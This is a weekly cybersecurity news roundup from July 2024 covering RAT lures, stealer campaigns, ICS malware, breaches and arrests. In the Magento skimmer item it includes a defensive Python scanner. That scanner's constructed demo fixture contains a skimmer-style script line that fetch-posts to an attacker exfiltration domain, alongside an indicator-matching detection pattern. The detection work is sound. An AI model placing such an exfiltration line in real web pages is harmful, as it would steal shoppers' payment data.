Friday, July 26th, 2024
Cybersecurity Week in Review (25/07/24)
Cybercriminals Exploit CrowdStrike Update Mishap to Distribute Remcos RAT Malware
Cybersecurity firm CrowdStrike, which is facing the heat for causing worldwide IT disruptions by pushing out a flawed update to Windows devices, is now warning that threat actors are exploiting the situation to distribute Remcos RAT to its customers in Latin America under the guise of providing a hotfix.
The attack chains involve distributing a ZIP archive file named “crowdstrike-hotfix.zip,” which contains a malware loader named Hijack Loader (aka DOILoader or IDAT Loader) that, in turn, launches the Remcos RAT payload.
Source: https://thehackernews.com/2024/07/cybercriminals-exploit-crowdstrike.html
Verizon to pay $16 million in TracFone data breach settlement
Verizon Communications has agreed to pay a $16,000,000 settlement with the Federal Communications Commission (FCC) in the U.S. concerning three data breach incidents at its wholly owned subsidiary, TracFone Wireless, suffered after its acquisition in 2021.
TracFone is a telecommunications service provider offering services through Total by Verizon Wireless, Straight Talk, and Walmart Family Mobile, among others. Apart from the hefty civil penalty, the announced settlement agreement requires the communications firm to implement specific measures to increase the level of data security for its customers going forward.
Telegram App Flaw Exploited to Spread Malware Hidden in Videos
A zero-day security flaw in Telegram’s mobile app for Android called EvilVideo made it possible for attackers to send malicious files disguised as harmless-looking videos.
The exploit appeared for sale for an unknown price in an underground forum on June 6, 2024, ESET said. Following responsible disclosure on June 26, the issue was addressed by Telegram in version 10.14.5 released on July 11.
It’s believed that the payload is concocted using Telegram’s application programming interface (API), which allows for programmatic uploads of multimedia files to chats and channels.
Source: https://thehackernews.com/2024/07/telegram-app-flaw-exploited-to-spread.html
FrostyGoop ICS Malware Left Ukrainian City’s Residents Without Heating
Industrial cybersecurity firm Dragos has shared details on FrostyGoop, a recently discovered piece of malware designed to target industrial control systems (ICS).
FrostyGoop was used in January 2024 in an attack that disrupted systems at a municipal district energy company in the Ukrainian city of Lviv. The targeted facility provides central heating services to 600 apartment buildings in the Lviv metropolitan area, and the attack resulted in loss of heating for residents. The attackers gained access to the targeted energy facility’s systems in April 2023, likely by exploiting an undetermined vulnerability in an internet-exposed Mikrotik router.
Source: https://www.securityweek.com/frostygoop-ics-malware-left-ukrainian-citys-residents-without-heating/
Microsoft Defender Flaw Exploited to Deliver ACR, Lumma, and Meduza Stealers
A now-patched security flaw in the Microsoft Defender SmartScreen has been exploited as part of a new campaign designed to deliver information stealers such as ACR Stealer, Lumma, and Meduza.
Fortinet FortiGuard Labs said it detected the stealer campaign targeting Spain, Thailand, and the U.S. using booby-trapped files that exploit CVE-2024-21412 (CVSS score: 8.1).
The high-severity vulnerability allows an attacker to sidestep SmartScreen protection and drop malicious payloads. Microsoft addressed this issue as part of its monthly security updates released in February 2024.
Source: https://thehackernews.com/2024/07/microsoft-defender-flaw-exploited-to.html
KnowBe4 Hires Fake North Korean IT Worker, Catches New Employee Planting Malware
Florida security awareness training firm KnowBe4 on Tuesday said a North Korean operative posing as a software engineer slipped past its hiring background checks and spent the first 25 minutes on the job attempting to plant malware on a company workstation.
KnowBe4 said its security team detected suspicious activities coming from a newly hired Principal Software Engineer’s workstation and quickly determined the malicious insider was using a Raspberry Pi to download malware, manipulate session history files, and execute unauthorized software.
Greece’s Land Registry agency breached in wave of 400 cyberattacks
The Land Registry agency in Greece has announced that it suffered a limited-scope data breach following a wave of 400 cyberattacks targeting its IT infrastructure over the last week.
The agency said hackers managed to compromise employee terminals and steal 1.2 GB of data, corresponding to roughly 0.0006% of the total data held by the government organization.
The stolen data reportedly does not contain any citizens’ personal information but primarily consists of typical administrative documents, the exposure of which is not expected to impact the registry’s operations.
China-linked Daggerfly hackers update their toolset, likely after exposure
An alleged Chinese government-backed hacking group has made a major update to its toolset and introduced several new versions of its malware, most likely to avoid detection after its older variants were uncovered, according to recent research.
The hackers from the Daggerfly group, also known as Evasive Panda and Bronze Highland, have added to their arsenal a new malware family based on the group’s most popular MgBot malware and a new version of the Macma macOS backdoor.
Source: https://therecord.media/china-linked-daggerfly-revamps-toolset
Magento Sites Targeted with Sneaky Credit Card Skimmer via Swap Files
Threat actors have been observed using swap files in compromised websites to conceal a persistent credit card skimmer and harvest payment information.
The sneaky technique, observed by Sucuri on a Magento e-commerce site’s checkout page, allowed the malware to survive multiple cleanup attempts, the company said.
The skimmer is designed to capture all the data entered into the credit card form on the website and exfiltrate the details to an attacker-controlled domain named “amazon-analytic[.]com,” which was registered in February 2024.
Source: https://thehackernews.com/2024/07/magento-sites-targeted-with-sneaky.html
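As an added illustration of the swap-file concealment described above (this is not code from Sucuri or the original report), the script below walks a web root, flags files with editor swap or backup names, and checks their contents for script markers and the exfiltration domain named in the item. The sample web root it builds is constructed for the dry run and is not a real Magento layout; `EXFIL_DOMAIN` is the indicator quoted above, matched in both plain and de-fanged form.

```python
import os
import re
import tempfile
from pathlib import Path

# Indicator quoted in the report above (de-fanged there); the scanner
# normalises "[.]" so both spellings match.
EXFIL_DOMAIN = "amazon-analytic.com"

# Editor swap/backup naming patterns: vim ".name.swp"/"name.swo", emacs "name~".
SWAP_NAME = re.compile(r"(^\..*\.sw[op]$)|(\.sw[op]$)|(~$)")
CODE_MARKERS = (b"<?php", b"<script", b"eval(", b"base64_decode(")


def is_swap_file(name: str) -> bool:
    """True if the file name looks like an editor swap or backup file."""
    return bool(SWAP_NAME.search(name))


def inspect_file(path: Path) -> dict:
    """Collect the three signals used to triage a single file."""
    data = path.read_bytes()
    flat = data.replace(b"[.]", b".")  # undo de-fanging before matching
    return {
        "path": str(path),
        "swap_name": is_swap_file(path.name),
        "has_code": any(m in data for m in CODE_MARKERS),
        "has_ioc": EXFIL_DOMAIN.encode() in flat,
    }


def scan_webroot(root: str) -> list[dict]:
    """Return findings for files with swap-style names or the exfil domain."""
    findings = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            info = inspect_file(Path(dirpath) / name)
            if info["swap_name"] or info["has_ioc"]:
                findings.append(info)
    return findings


def demo_root() -> str:
    """Build a constructed sample web root (not real Magento files)."""
    root = tempfile.mkdtemp(prefix="webroot-")
    pub = Path(root, "pub")
    pub.mkdir()
    (pub / "index.php").write_text("<?php echo 'storefront'; ?>")
    # Constructed: a swap file carrying script code plus the exfil domain.
    (pub / ".checkout.php.swp").write_bytes(
        b"<script>fetch('https://amazon-analytic[.]com/c',{method:'POST'})</script>")
    (pub / "notes.txt").write_text("plain text, no code")
    return root


if __name__ == "__main__":
    for finding in scan_webroot(demo_root()):
        print(finding)
```

Stray swap files under a web root are worth removing regardless of content, since a web server will happily serve or include them if a path references them.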
Spanish police arrest three suspects linked to pro-Moscow NoName057(16) hackers
Spanish police arrested three suspected members of the pro-Russian hacker group NoName057(16), known for carrying out distributed denial-of-service (DDoS) attacks against Ukraine’s allies.
Spain’s Civil Guard announced on Saturday that they searched the suspects’ apartments in the towns of Manacor, Huelva and Seville, seizing devices and “other evidence.”
The three alleged NoName members are suspected of their involvement in DDoS attacks against public institutions and strategic sectors in Spain and other NATO countries that support Ukraine. The attacks work by flooding targeted websites with junk traffic, making them unreachable.
Source: https://therecord.media/spain-arrest-noname-russia-hackers